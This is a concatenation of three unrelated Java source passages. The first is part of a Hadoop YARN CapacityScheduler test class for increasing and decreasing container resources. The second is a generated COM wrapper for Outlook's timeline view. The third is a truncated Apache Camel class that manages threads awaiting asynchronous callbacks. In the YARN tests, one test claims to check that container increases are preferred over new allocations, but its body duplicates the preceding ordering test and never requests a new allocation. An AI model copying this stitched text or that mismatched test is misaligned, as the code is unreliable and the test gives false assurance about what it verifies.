rm1.waitForState(nm1, containerId2, RMContainerState.ALLOCATED,
10 * 1000));
// Acquire them, and NM report RUNNING
am1.allocate(null, null);
sentRMContainerLaunched(rm1, containerId2);
    // am1 asks to increase container2 from 2GB to 8GB
am1.sendContainerResizingRequest(Arrays.asList(
UpdateContainerRequest
.newInstance(0, containerId2,
ContainerUpdateType.INCREASE_RESOURCE,
Resources.createResource(8 * GB))));
checkPendingResource(rm1, "default", 6 * GB, null);
Assert.assertEquals(6 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
    // NM1 does 1 heartbeat
CapacityScheduler cs = (CapacityScheduler) rm1.getResourceScheduler();
RMNode rmNode1 = rm1.getRMContext().getRMNodes().get(nm1.getNodeId());
cs.handle(new NodeUpdateSchedulerEvent(rmNode1));
RMContainer rmContainer2 = app.getLiveContainersMap().get(containerId2);
/* Check reservation statuses */
// Increase request should be reserved
Assert.assertTrue(rmContainer2.hasIncreaseReservation());
Assert.assertEquals(6 * GB, rmContainer2.getReservedResource().getMemorySize());
Assert.assertFalse(app.getReservedContainers().isEmpty());
Assert.assertNotNull(cs.getNode(nm1.getNodeId()).getReservedContainer());
// Pending resource will not be changed since it's not satisfied
checkPendingResource(rm1, "default", 6 * GB, null);
Assert.assertEquals(6 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
// Queue/user/application's usage will be updated
checkUsedResource(rm1, "default", 9 * GB, null);
Assert.assertEquals(9 * GB, ((LeafQueue) cs.getQueue("default"))
.getUser("user").getUsed().getMemorySize());
Assert.assertEquals(3 * GB,
app.getAppAttemptResourceUsage().getUsed().getMemorySize());
Assert.assertEquals(6 * GB,
app.getAppAttemptResourceUsage().getReserved().getMemorySize());
// Kill the application
cs.handle(new AppAttemptRemovedSchedulerEvent(am1.getApplicationAttemptId(),
RMAppAttemptState.KILLED, false));
/* Check statuses after reservation satisfied */
// Increase request should be unreserved
Assert.assertTrue(app.getReservedContainers().isEmpty());
Assert.assertNull(cs.getNode(nm1.getNodeId()).getReservedContainer());
Assert.assertFalse(rmContainer2.hasIncreaseReservation());
// Pending resource will be changed since it's satisfied
checkPendingResource(rm1, "default", 0 * GB, null);
Assert.assertEquals(0 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
// Queue/user/application's usage will be updated
checkUsedResource(rm1, "default", 0 * GB, null);
Assert.assertEquals(0 * GB, ((LeafQueue) cs.getQueue("default"))
.getUser("user").getUsed().getMemorySize());
Assert.assertEquals(0 * GB,
app.getAppAttemptResourceUsage().getReserved().getMemorySize());
Assert.assertEquals(0 * GB,
app.getAppAttemptResourceUsage().getUsed().getMemorySize());
rm1.close();
}
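  /**
   * Helper: requests {@code nContainer} containers of {@code mem} MB at the given priority,
   * waits for the last one to reach ALLOCATED, acquires them with an empty allocate() call and
   * then drives each container to RUNNING. Container ids are expected to be assigned
   * sequentially starting at {@code startContainerId}.
   */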
private void allocateAndLaunchContainers(MockAM am, MockNM nm, MockRM rm,
int nContainer, int mem, int priority, int startContainerId)
throws Exception {
am.allocate(Arrays
.asList(ResourceRequest.newInstance(Priority.newInstance(priority), "*",
Resources.createResource(mem), nContainer)),
null);
ContainerId lastContainerId = ContainerId.newContainerId(
am.getApplicationAttemptId(), startContainerId + nContainer - 1);
Assert.assertTrue(rm.waitForState(nm, lastContainerId,
RMContainerState.ALLOCATED, 10 * 1000));
// Acquire them, and NM report RUNNING
am.allocate(null, null);
for (int cId = startContainerId; cId < startContainerId
+ nContainer; cId++) {
sentRMContainerLaunched(rm,
ContainerId.newContainerId(am.getApplicationAttemptId(), cId));
rm.waitForContainerState(
ContainerId.newContainerId(am.getApplicationAttemptId(), cId),
RMContainerState.RUNNING);
}
}
@Test
public void testOrderOfIncreaseContainerRequestAllocation()
throws Exception {
/**
     * There are multiple containers that need to be increased; check that they
     * are increased in priority order and that, for equal priorities, the
     * container with the smaller containerId is preferred.
*/
MockRM rm1 = new MockRM() {
@Override
public RMNodeLabelsManager createNodeLabelManager() {
return mgr;
}
};
rm1.start();
MockNM nm1 = rm1.registerNode("h1:1234", 10 * GB);
// app1 -> a1
RMApp app1 = rm1.submitApp(1 * GB, "app", "user", null, "default");
MockAM am1 = MockRM.launchAndRegisterAM(app1, rm1, nm1);
FiCaSchedulerApp app = TestUtils.getFiCaSchedulerApp(
rm1, app1.getApplicationId());
ApplicationAttemptId attemptId = am1.getApplicationAttemptId();
// Container 2, 3 (priority=3)
allocateAndLaunchContainers(am1, nm1, rm1, 2, 1 * GB, 3, 2);
// Container 4, 5 (priority=2)
allocateAndLaunchContainers(am1, nm1, rm1, 2, 1 * GB, 2, 4);
// Container 6, 7 (priority=4)
allocateAndLaunchContainers(am1, nm1, rm1, 2, 1 * GB, 4, 6);
// am1 asks to change its container[2-7] from 1G to 2G
List<UpdateContainerRequest> increaseRequests = new ArrayList<>();
for (int cId = 2; cId <= 7; cId++) {
ContainerId containerId =
ContainerId.newContainerId(am1.getApplicationAttemptId(), cId);
increaseRequests.add(UpdateContainerRequest
.newInstance(0, containerId,
ContainerUpdateType.INCREASE_RESOURCE,
Resources.createResource(2 * GB)));
}
am1.sendContainerResizingRequest(increaseRequests);
checkPendingResource(rm1, "default", 6 * GB, null);
Assert.assertEquals(6 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
// Get rmNode1
CapacityScheduler cs = (CapacityScheduler) rm1.getResourceScheduler();
RMNode rmNode1 = rm1.getRMContext().getRMNodes().get(nm1.getNodeId());
    // assignContainer: containers 4/5/2 are increased (highest priority first,
    // then earliest allocated)
cs.handle(new NodeUpdateSchedulerEvent(rmNode1));
AllocateResponse allocateResponse = am1.allocate(null, null);
Assert.assertEquals(3, allocateResponse.getUpdatedContainers().size());
verifyContainerIncreased(allocateResponse,
ContainerId.newContainerId(attemptId, 4), 2 * GB);
verifyContainerIncreased(allocateResponse,
ContainerId.newContainerId(attemptId, 5), 2 * GB);
verifyContainerIncreased(allocateResponse,
ContainerId.newContainerId(attemptId, 2), 2 * GB);
/* Check statuses after allocation */
    // There are still 3 pending increase requests
checkPendingResource(rm1, "default", 3 * GB, null);
Assert.assertEquals(3 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
// Queue/user/application's usage will be updated
checkUsedResource(rm1, "default", 10 * GB, null);
Assert.assertEquals(10 * GB, ((LeafQueue) cs.getQueue("default"))
.getUser("user").getUsed().getMemorySize());
Assert.assertEquals(0 * GB,
app.getAppAttemptResourceUsage().getReserved().getMemorySize());
Assert.assertEquals(10 * GB,
app.getAppAttemptResourceUsage().getUsed().getMemorySize());
rm1.close();
}
@Test
public void testIncreaseContainerRequestGetPreferrence()
throws Exception {
/**
     * There are multiple containers that need to be increased and several new
     * container allocation requests; the scheduler should try to increase
     * existing containers before allocating new ones.
*/
MockRM rm1 = new MockRM() {
@Override
public RMNodeLabelsManager createNodeLabelManager() {
return mgr;
}
};
rm1.start();
MockNM nm1 = rm1.registerNode("h1:1234", 10 * GB);
// app1 -> a1
RMApp app1 = rm1.submitApp(1 * GB, "app", "user", null, "default");
MockAM am1 = MockRM.launchAndRegisterAM(app1, rm1, nm1);
FiCaSchedulerApp app = TestUtils.getFiCaSchedulerApp(
rm1, app1.getApplicationId());
ApplicationAttemptId attemptId = am1.getApplicationAttemptId();
// Container 2, 3 (priority=3)
allocateAndLaunchContainers(am1, nm1, rm1, 2, 1 * GB, 3, 2);
// Container 4, 5 (priority=2)
allocateAndLaunchContainers(am1, nm1, rm1, 2, 1 * GB, 2, 4);
// Container 6, 7 (priority=4)
allocateAndLaunchContainers(am1, nm1, rm1, 2, 1 * GB, 4, 6);
// am1 asks to change its container[2-7] from 1G to 2G
List<UpdateContainerRequest> increaseRequests = new ArrayList<>();
for (int cId = 2; cId <= 7; cId++) {
ContainerId containerId =
ContainerId.newContainerId(am1.getApplicationAttemptId(), cId);
increaseRequests.add(UpdateContainerRequest
.newInstance(0, containerId,
ContainerUpdateType.INCREASE_RESOURCE,
Resources.createResource(2 * GB)));
}
am1.sendContainerResizingRequest(increaseRequests);
checkPendingResource(rm1, "default", 6 * GB, null);
Assert.assertEquals(6 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
// Get rmNode1
CapacityScheduler cs = (CapacityScheduler) rm1.getResourceScheduler();
RMNode rmNode1 = rm1.getRMContext().getRMNodes().get(nm1.getNodeId());
    // assignContainer: containers 4/5/2 are increased (highest priority first,
    // then earliest allocated)
cs.handle(new NodeUpdateSchedulerEvent(rmNode1));
AllocateResponse allocateResponse = am1.allocate(null, null);
Assert.assertEquals(3, allocateResponse.getUpdatedContainers().size());
verifyContainerIncreased(allocateResponse,
ContainerId.newContainerId(attemptId, 4), 2 * GB);
verifyContainerIncreased(allocateResponse,
ContainerId.newContainerId(attemptId, 5), 2 * GB);
verifyContainerIncreased(allocateResponse,
ContainerId.newContainerId(attemptId, 2), 2 * GB);
/* Check statuses after allocation */
    // There are still 3 pending increase requests
checkPendingResource(rm1, "default", 3 * GB, null);
Assert.assertEquals(3 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
// Queue/user/application's usage will be updated
checkUsedResource(rm1, "default", 10 * GB, null);
Assert.assertEquals(10 * GB, ((LeafQueue) cs.getQueue("default"))
.getUser("user").getUsed().getMemorySize());
Assert.assertEquals(0 * GB,
app.getAppAttemptResourceUsage().getReserved().getMemorySize());
Assert.assertEquals(10 * GB,
app.getAppAttemptResourceUsage().getUsed().getMemorySize());
rm1.close();
}
@Test (timeout = 60000)
public void testDecreaseContainerWillNotDeadlockContainerAllocation()
throws Exception {
// create and start MockRM with our MyScheduler
MockRM rm = new MockRM() {
@Override
public ResourceScheduler createScheduler() {
CapacityScheduler cs = new MyScheduler();
cs.setConf(conf);
return cs;
}
};
rm.start();
// register a node
MockNM nm = rm.registerNode("h1:1234", 20 * GB);
// submit an application -> app1
RMApp app1 = rm.submitApp(3 * GB, "app", "user", null, "default");
MockAM am1 = MockRM.launchAndRegisterAM(app1, rm, nm);
// making sure resource is allocated
checkUsedResource(rm, "default", 3 * GB, null);
FiCaSchedulerApp app = TestUtils.getFiCaSchedulerApp(
rm, app1.getApplicationId());
Assert.assertEquals(3 * GB,
app.getAppAttemptResourceUsage().getUsed().getMemorySize());
// making sure container is launched
ContainerId containerId1 =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 1);
sentRMContainerLaunched(rm, containerId1);
// submit allocation request for a new container
am1.allocate(Collections.singletonList(ResourceRequest.newInstance(
Priority.newInstance(1), "*", Resources.createResource(2 * GB), 1)),
null);
// nm reports status update and triggers container allocation
nm.nodeHeartbeat(true);
    // In the meantime, am1 asks to decrease its AM container resource from
    // 3GB to 1GB
AllocateResponse response = am1.sendContainerResizingRequest(
Collections.singletonList(UpdateContainerRequest
.newInstance(0, containerId1,
ContainerUpdateType.DECREASE_RESOURCE,
Resources.createResource(GB))));
    // verify that the container resource is decreased
verifyContainerDecreased(response, containerId1, GB);
rm.close();
}
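  // Helper: asserts the pending memory recorded against the named queue for the given node
  // label (NO_LABEL when label is null).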
private void checkPendingResource(MockRM rm, String queueName, int memory,
String label) {
CapacityScheduler cs = (CapacityScheduler) rm.getResourceScheduler();
CSQueue queue = cs.getQueue(queueName);
Assert.assertEquals(memory,
queue.getQueueResourceUsage()
.getPending(label == null ? RMNodeLabelsManager.NO_LABEL : label)
.getMemorySize());
}
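  // Helper: asserts the used memory recorded against the named queue for the given node
  // label (NO_LABEL when label is null).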
private void checkUsedResource(MockRM rm, String queueName, int memory,
String label) {
CapacityScheduler cs = (CapacityScheduler) rm.getResourceScheduler();
CSQueue queue = cs.getQueue(queueName);
Assert.assertEquals(memory,
queue.getQueueResourceUsage()
.getUsed(label == null ? RMNodeLabelsManager.NO_LABEL : label)
.getMemorySize());
}
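  // Helper: finds the update for the given container in the AllocateResponse and asserts it is
  // an INCREASE_RESOURCE update with the expected memory size; fails if the container is absent.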
private void verifyContainerIncreased(AllocateResponse response,
ContainerId containerId, int mem) {
List<UpdatedContainer> increasedContainers =
response.getUpdatedContainers();
boolean found = false;
for (UpdatedContainer c : increasedContainers) {
if (c.getContainer().getId().equals(containerId)) {
found = true;
Assert.assertEquals(ContainerUpdateType.INCREASE_RESOURCE,
c.getUpdateType());
Assert.assertEquals(mem,
c.getContainer().getResource().getMemorySize());
}
}
if (!found) {
Assert.fail("Container not increased: containerId=" + containerId);
}
}
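  // Helper: finds the update for the given container in the AllocateResponse and asserts it is
  // a DECREASE_RESOURCE update with the expected memory size; fails if the container is absent.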
private void verifyContainerDecreased(AllocateResponse response,
ContainerId containerId, int mem) {
List<UpdatedContainer> decreasedContainers =
response.getUpdatedContainers();
boolean found = false;
for (UpdatedContainer c : decreasedContainers) {
if (c.getContainer().getId().equals(containerId)) {
found = true;
Assert.assertEquals(ContainerUpdateType.DECREASE_RESOURCE,
c.getUpdateType());
Assert.assertEquals(mem,
c.getContainer().getResource().getMemorySize());
}
}
if (!found) {
Assert.fail("Container not decreased: containerId=" + containerId);
}
}
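  // Helper: fires a LAUNCHED event at the RMContainer so the scheduler treats the container as
  // started; fails if the container is not known to the scheduler.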
private void sentRMContainerLaunched(MockRM rm, ContainerId containerId) {
CapacityScheduler cs = (CapacityScheduler) rm.getResourceScheduler();
RMContainer rmContainer = cs.getRMContainer(containerId);
if (rmContainer != null) {
rmContainer.handle(
new RMContainerEvent(containerId, RMContainerEventType.LAUNCHED));
} else {
Assert.fail("Cannot find RMContainer");
}
}
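  // Helper: asserts the memory still available on the given scheduler node.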
private void verifyAvailableResourceOfSchedulerNode(MockRM rm, NodeId nodeId,
int expectedMemory) {
CapacityScheduler cs = (CapacityScheduler) rm.getResourceScheduler();
SchedulerNode node = cs.getNode(nodeId);
Assert.assertEquals(expectedMemory,
node.getAvailableResource().getMemorySize());
}
}
|
|
/* ** GENERATED FILE - DO NOT MODIFY ** */
package com.wilutions.mslib.outlook.impl;
import com.wilutions.com.*;
@SuppressWarnings("all")
@CoClass(guid="{C091A9F7-A463-DB41-5DAE-69E7A5F7FCBC}")
public class _TimelineViewImpl extends Dispatch implements com.wilutions.mslib.outlook._TimelineView {
@DeclDISPID(61440) public com.wilutions.mslib.outlook._Application getApplication() throws ComException {
final Object obj = this._dispatchCall(61440,"Application", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
return Dispatch.as(obj, com.wilutions.mslib.outlook.impl._ApplicationImpl.class);
}
@DeclDISPID(61450) public com.wilutions.mslib.outlook.OlObjectClass getClass_() throws ComException {
final Object obj = this._dispatchCall(61450,"Class", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
return com.wilutions.mslib.outlook.OlObjectClass.valueOf((Integer)obj);
}
@DeclDISPID(61451) public com.wilutions.mslib.outlook._NameSpace getSession() throws ComException {
final Object obj = this._dispatchCall(61451,"Session", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
return Dispatch.as(obj, com.wilutions.mslib.outlook.impl._NameSpaceImpl.class);
}
@DeclDISPID(61441) public IDispatch getParent() throws ComException {
final Object obj = this._dispatchCall(61441,"Parent", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
return (IDispatch)obj;
}
@DeclDISPID(407) public void Apply() throws ComException {
this._dispatchCall(407,"Apply", DISPATCH_METHOD,null);
}
@DeclDISPID(61490) public com.wilutions.mslib.outlook.View Copy(final String Name, final com.wilutions.mslib.outlook.OlViewSaveOption SaveOption) throws ComException {
assert(Name != null);
assert(SaveOption != null);
final Object obj = this._dispatchCall(61490,"Copy", DISPATCH_METHOD,null,Name,SaveOption.value);
if (obj == null) return null;
return Dispatch.as(obj, com.wilutions.mslib.outlook.impl.ViewImpl.class);
}
@DeclDISPID(61514) public void Delete() throws ComException {
this._dispatchCall(61514,"Delete", DISPATCH_METHOD,null);
}
@DeclDISPID(64068) public void Reset() throws ComException {
this._dispatchCall(64068,"Reset", DISPATCH_METHOD,null);
}
@DeclDISPID(61512) public void Save() throws ComException {
this._dispatchCall(61512,"Save", DISPATCH_METHOD,null);
}
@DeclDISPID(64065) public String getLanguage() throws ComException {
final Object obj = this._dispatchCall(64065,"Language", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
return (String)obj;
}
@DeclDISPID(64065) public void setLanguage(final String value) throws ComException {
assert(value != null);
this._dispatchCall(64065,"Language", DISPATCH_PROPERTYPUT,value);
}
@DeclDISPID(64064) public Boolean getLockUserChanges() throws ComException {
final Object obj = this._dispatchCall(64064,"LockUserChanges", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
return (Boolean)obj;
}
@DeclDISPID(64064) public void setLockUserChanges(final Boolean value) throws ComException {
assert(value != null);
this._dispatchCall(64064,"LockUserChanges", DISPATCH_PROPERTYPUT,value);
}
@DeclDISPID(0) public String getName() throws ComException {
final Object obj = this._dispatchCall(0,"Name", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
return (String)obj;
}
@DeclDISPID(0) public void setName(final String value) throws ComException {
assert(value != null);
this._dispatchCall(0,"Name", DISPATCH_PROPERTYPUT,value);
}
@DeclDISPID(64063) public com.wilutions.mslib.outlook.OlViewSaveOption getSaveOption() throws ComException {
final Object obj = this._dispatchCall(64063,"SaveOption", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
return com.wilutions.mslib.outlook.OlViewSaveOption.valueOf((Integer)obj);
}
@DeclDISPID(64062) public Boolean getStandard() throws ComException {
final Object obj = this._dispatchCall(64062,"Standard", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
return (Boolean)obj;
}
@DeclDISPID(404) public com.wilutions.mslib.outlook.OlViewType getViewType() throws ComException {
final Object obj = this._dispatchCall(404,"ViewType", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
return com.wilutions.mslib.outlook.OlViewType.valueOf((Integer)obj);
}
@DeclDISPID(64060) public String getXML() throws ComException {
final Object obj = this._dispatchCall(64060,"XML", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
return (String)obj;
}
@DeclDISPID(64060) public void setXML(final String value) throws ComException {
assert(value != null);
this._dispatchCall(64060,"XML", DISPATCH_PROPERTYPUT,value);
}
@DeclDISPID(64054) public void GoToDate(final java.util.Date Date) throws ComException {
assert(Date != null);
this._dispatchCall(64054,"GoToDate", DISPATCH_METHOD,null,Date);
}
@DeclDISPID(409) public String getFilter() throws ComException {
final Object obj = this._dispatchCall(409,"Filter", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
return (String)obj;
}
@DeclDISPID(409) public void setFilter(final String value) throws ComException {
assert(value != null);
this._dispatchCall(409,"Filter", DISPATCH_PROPERTYPUT,value);
}
@DeclDISPID(8449) public String getStartField() throws ComException {
final Object obj = this._dispatchCall(8449,"StartField", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
return (String)obj;
}
@DeclDISPID(8449) public void setStartField(final String value) throws ComException {
assert(value != null);
this._dispatchCall(8449,"StartField", DISPATCH_PROPERTYPUT,value);
}
@DeclDISPID(64379) public String getEndField() throws ComException {
final Object obj = this._dispatchCall(64379,"EndField", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
return (String)obj;
}
@DeclDISPID(64379) public void setEndField(final String value) throws ComException {
assert(value != null);
this._dispatchCall(64379,"EndField", DISPATCH_PROPERTYPUT,value);
}
@DeclDISPID(64344) public com.wilutions.mslib.outlook.OrderFields getGroupByFields() throws ComException {
final Object obj = this._dispatchCall(64344,"GroupByFields", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
final Dispatch disp = (Dispatch)obj;
return disp.as(com.wilutions.mslib.outlook.OrderFields.class);
}
@DeclDISPID(64384) public com.wilutions.mslib.outlook.OlDefaultExpandCollapseSetting getDefaultExpandCollapseSetting() throws ComException {
final Object obj = this._dispatchCall(64384,"DefaultExpandCollapseSetting", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
return com.wilutions.mslib.outlook.OlDefaultExpandCollapseSetting.valueOf((Integer)obj);
}
@DeclDISPID(64384) public void setDefaultExpandCollapseSetting(final com.wilutions.mslib.outlook.OlDefaultExpandCollapseSetting value) throws ComException {
assert(value != null);
this._dispatchCall(64384,"DefaultExpandCollapseSetting", DISPATCH_PROPERTYPUT,value.value);
}
@DeclDISPID(64373) public Boolean getShowWeekNumbers() throws ComException {
final Object obj = this._dispatchCall(64373,"ShowWeekNumbers", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
return (Boolean)obj;
}
@DeclDISPID(64373) public void setShowWeekNumbers(final Boolean value) throws ComException {
assert(value != null);
this._dispatchCall(64373,"ShowWeekNumbers", DISPATCH_PROPERTYPUT,value);
}
@DeclDISPID(64043) public Integer getMaxLabelWidth() throws ComException {
final Object obj = this._dispatchCall(64043,"MaxLabelWidth", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
return (Integer)obj;
}
@DeclDISPID(64043) public void setMaxLabelWidth(final Integer value) throws ComException {
assert(value != null);
this._dispatchCall(64043,"MaxLabelWidth", DISPATCH_PROPERTYPUT,value);
}
@DeclDISPID(64372) public Boolean getShowLabelWhenViewingByMonth() throws ComException {
final Object obj = this._dispatchCall(64372,"ShowLabelWhenViewingByMonth", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
return (Boolean)obj;
}
@DeclDISPID(64372) public void setShowLabelWhenViewingByMonth(final Boolean value) throws ComException {
assert(value != null);
this._dispatchCall(64372,"ShowLabelWhenViewingByMonth", DISPATCH_PROPERTYPUT,value);
}
@DeclDISPID(64040) public com.wilutions.mslib.outlook.ViewFont getUpperScaleFont() throws ComException {
final Object obj = this._dispatchCall(64040,"UpperScaleFont", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
final Dispatch disp = (Dispatch)obj;
return disp.as(com.wilutions.mslib.outlook.ViewFont.class);
}
@DeclDISPID(64044) public com.wilutions.mslib.outlook.ViewFont getLowerScaleFont() throws ComException {
final Object obj = this._dispatchCall(64044,"LowerScaleFont", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
final Dispatch disp = (Dispatch)obj;
return disp.as(com.wilutions.mslib.outlook.ViewFont.class);
}
@DeclDISPID(64045) public com.wilutions.mslib.outlook.ViewFont getItemFont() throws ComException {
final Object obj = this._dispatchCall(64045,"ItemFont", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
final Dispatch disp = (Dispatch)obj;
return disp.as(com.wilutions.mslib.outlook.ViewFont.class);
}
@DeclDISPID(64392) public com.wilutions.mslib.outlook.OlTimelineViewMode getTimelineViewMode() throws ComException {
final Object obj = this._dispatchCall(64392,"TimelineViewMode", DISPATCH_PROPERTYGET,null);
if (obj == null) return null;
return com.wilutions.mslib.outlook.OlTimelineViewMode.valueOf((Integer)obj);
}
@DeclDISPID(64392) public void setTimelineViewMode(final com.wilutions.mslib.outlook.OlTimelineViewMode value) throws ComException {
assert(value != null);
this._dispatchCall(64392,"TimelineViewMode", DISPATCH_PROPERTYPUT,value.value);
}
public _TimelineViewImpl(String progId) throws ComException {
super(progId, "{0006309C-0000-0000-C000-000000000046}");
}
protected _TimelineViewImpl(long ndisp) {
super(ndisp);
}
public String toString() {
return "[_TimelineViewImpl" + super.toString() + "]";
}
}
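// Usage sketch (illustrative, not part of the generated wrapper above): reading and writing
// timeline-view properties through a typed wrapper obtained from a raw Dispatch handle.
// It assumes a _TimelineView interface exists alongside this Impl class, mirroring the
// as(...) pattern used above for OrderFields and ViewFont; `rawViewDispatch` is hypothetical.
//
//   _TimelineView view = rawViewDispatch.as(com.wilutions.mslib.outlook._TimelineView.class);
//   view.setShowWeekNumbers(Boolean.TRUE);    // DISPATCH_PROPERTYPUT on DISPID 64373
//   String viewXml = view.getXML();           // DISPATCH_PROPERTYGET on DISPID 64060
//   view.GoToDate(new java.util.Date());      // DISPATCH_METHOD on DISPID 64054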
|
|
/**
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.camel.impl;
import java.util.Collection;
import java.util.Collections;
import java.util.LinkedList;
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;
import java.util.concurrent.CountDownLatch;
import java.util.concurrent.RejectedExecutionException;
import java.util.concurrent.atomic.AtomicLong;
import org.apache.camel.Exchange;
import org.apache.camel.MessageHistory;
import org.apache.camel.NamedNode;
import org.apache.camel.processor.DefaultExchangeFormatter;
import org.apache.camel.spi.AsyncProcessorAwaitManager;
import org.apache.camel.spi.ExchangeFormatter;
import org.apache.camel.support.ServiceSupport;
import org.apache.camel.util.MessageHelper;
import org.apache.camel.util.ObjectHelper;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
public class DefaultAsyncProcessorAwaitManager extends ServiceSupport implements AsyncProcessorAwaitManager {
private static final Logger LOG = LoggerFactory.getLogger(DefaultAsyncProcessorAwaitManager.class);
private final AsyncProcessorAwaitManager.Statistics statistics = new UtilizationStatistics();
private final AtomicLong blockedCounter = new AtomicLong();
private final AtomicLong interruptedCounter = new AtomicLong();
private final AtomicLong totalDuration = new AtomicLong();
private final AtomicLong minDuration = new AtomicLong();
private final AtomicLong maxDuration = new AtomicLong();
private final AtomicLong meanDuration = new AtomicLong();
private final Map<Exchange, AwaitThread> inflight = new ConcurrentHashMap<>();
private final ExchangeFormatter exchangeFormatter;
private boolean interruptThreadsWhileStopping = true;
public DefaultAsyncProcessorAwaitManager() {
// setup exchange formatter to be used for message history dump
DefaultExchangeFormatter formatter = new DefaultExchangeFormatter();
formatter.setShowExchangeId(true);
formatter.setMultiline(true);
formatter.setShowHeaders(true);
formatter.setStyle(DefaultExchangeFormatter.OutputStyle.Fixed);
this.exchangeFormatter = formatter;
}
@Override
public void await(Exchange exchange, CountDownLatch latch) {
LOG.trace("Waiting for asynchronous callback before continuing for exchangeId: {} -> {}",
exchange.getExchangeId(), exchange);
try {
if (statistics.isStatisticsEnabled()) {
blockedCounter.incrementAndGet();
}
inflight.put(exchange, new AwaitThreadEntry(Thread.currentThread(), exchange, latch));
latch.await();
LOG.trace("Asynchronous callback received, will continue routing exchangeId: {} -> {}",
exchange.getExchangeId(), exchange);
} catch (InterruptedException e) {
LOG.trace("Interrupted while waiting for callback, will continue routing exchangeId: {} -> {}",
exchange.getExchangeId(), exchange);
exchange.setException(e);
} finally {
AwaitThread thread = inflight.remove(exchange);
if (statistics.isStatisticsEnabled() && thread != null) {
long time = thread.getWaitDuration();
long total = totalDuration.get() + time;
totalDuration.set(total);
if (time < minDuration.get()) {
minDuration.set(time);
} else if (time > maxDuration.get()) {
maxDuration.set(time);
}
// update mean
long count = blockedCounter.get();
long mean = count > 0 ? total / count : 0;
meanDuration.set(mean);
}
}
}
@Override
public void countDown(Exchange exchange, CountDownLatch latch) {
LOG.trace("Asynchronous callback received for exchangeId: {}", exchange.getExchangeId());
latch.countDown();
}
@Override
public int size() {
return inflight.size();
}
@Override
public Collection<AwaitThread> browse() {
return Collections.unmodifiableCollection(inflight.values());
}
@Override
public void interrupt(String exchangeId) {
// need to find the exchange with the given exchange id
Exchange found = null;
for (AsyncProcessorAwaitManager.AwaitThread entry : browse()) {
Exchange exchange = entry.getExchange();
if (exchangeId.equals(exchange.getExchangeId())) {
found = exchange;
break;
}
}
if (found != null) {
interrupt(found);
}
}
@Override
public void interrupt(Exchange exchange) {
AwaitThreadEntry entry = (AwaitThreadEntry) inflight.get(exchange);
if (entry != null) {
try {
StringBuilder sb = new StringBuilder();
sb.append("Interrupted while waiting for asynchronous callback, will release the following blocked thread which was waiting for exchange to finish processing with exchangeId: ");
sb.append(exchange.getExchangeId());
sb.append("\n");
sb.append(dumpBlockedThread(entry));
// dump a route stack trace of the exchange
String routeStackTrace = MessageHelper.dumpMessageHistoryStacktrace(exchange, exchangeFormatter, false);
if (routeStackTrace != null) {
sb.append(routeStackTrace);
}
LOG.warn(sb.toString());
} catch (Exception e) {
throw ObjectHelper.wrapRuntimeCamelException(e);
} finally {
if (statistics.isStatisticsEnabled()) {
interruptedCounter.incrementAndGet();
}
exchange.setException(new RejectedExecutionException("Interrupted while waiting for asynchronous callback for exchangeId: " + exchange.getExchangeId()));
entry.getLatch().countDown();
}
}
}
public boolean isInterruptThreadsWhileStopping() {
return interruptThreadsWhileStopping;
}
public void setInterruptThreadsWhileStopping(boolean interruptThreadsWhileStopping) {
this.interruptThreadsWhileStopping = interruptThreadsWhileStopping;
}
public Statistics getStatistics() {
return statistics;
}
@Override
protected void doStart() throws Exception {
// noop
}
@Override
protected void doStop() throws Exception {
Collection<AwaitThread> threads = browse();
int count = threads.size();
if (count > 0) {
LOG.warn("Shutting down while there are still {} inflight threads currently blocked.", count);
StringBuilder sb = new StringBuilder();
for (AwaitThread entry : threads) {
sb.append(dumpBlockedThread(entry));
}
if (isInterruptThreadsWhileStopping()) {
LOG.warn("The following threads are blocked and will be interrupted so the threads are released:\n" + sb.toString());
for (AwaitThread entry : threads) {
try {
interrupt(entry.getExchange());
} catch (Throwable e) {
LOG.warn("Error while interrupting thread: " + entry.getBlockedThread().getName() + ". This exception is ignored.", e);
}
}
} else {
LOG.warn("The following threads are blocked, and may reside in the JVM:\n" + sb.toString());
}
} else {
LOG.debug("Shutting down with no inflight threads.");
}
inflight.clear();
}
private static String dumpBlockedThread(AwaitThread entry) {
StringBuilder sb = new StringBuilder();
sb.append("\n");
sb.append("Blocked Thread\n");
sb.append("---------------------------------------------------------------------------------------------------------------------------------------\n");
